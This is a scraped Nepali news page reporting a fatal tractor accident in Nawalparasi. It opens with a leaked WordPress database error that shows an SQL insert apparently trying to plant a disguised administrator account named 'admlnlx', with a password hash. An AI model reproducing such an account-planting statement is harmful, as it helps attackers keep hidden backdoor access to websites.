WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Baop3OPMvVTu5NP839p7cva5B4i9Ik1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-21 09:17:56', '', 'admlnlx', 'admlnlx')
नवलपरासी, मंसिर २९ –
नवलपरासीमा गएराति भएको सवारी दुर्घटनामा परी एकजनाको मृत्यु भएको छ ।
दुर्घटनामा परी स्थानीयवासी ६२ वर्षीय लेखबहादुर गाहाको मृत्यु भएको इलाका प्रहरी कार्यालय कावासोतीले जनाएको छ ।
नवलपरासी देवचुली नपा–१५ सालघारीस्थित भित्री सडकखण्डमा दलदलेबाट सालघारीतर्फ जाँदै गरेको लु ३ त ४७५ नंको ट्याक्टर पल्ँिटदा सडक छेउमा रहेका उनको मृत्यु भएको हो । – रासस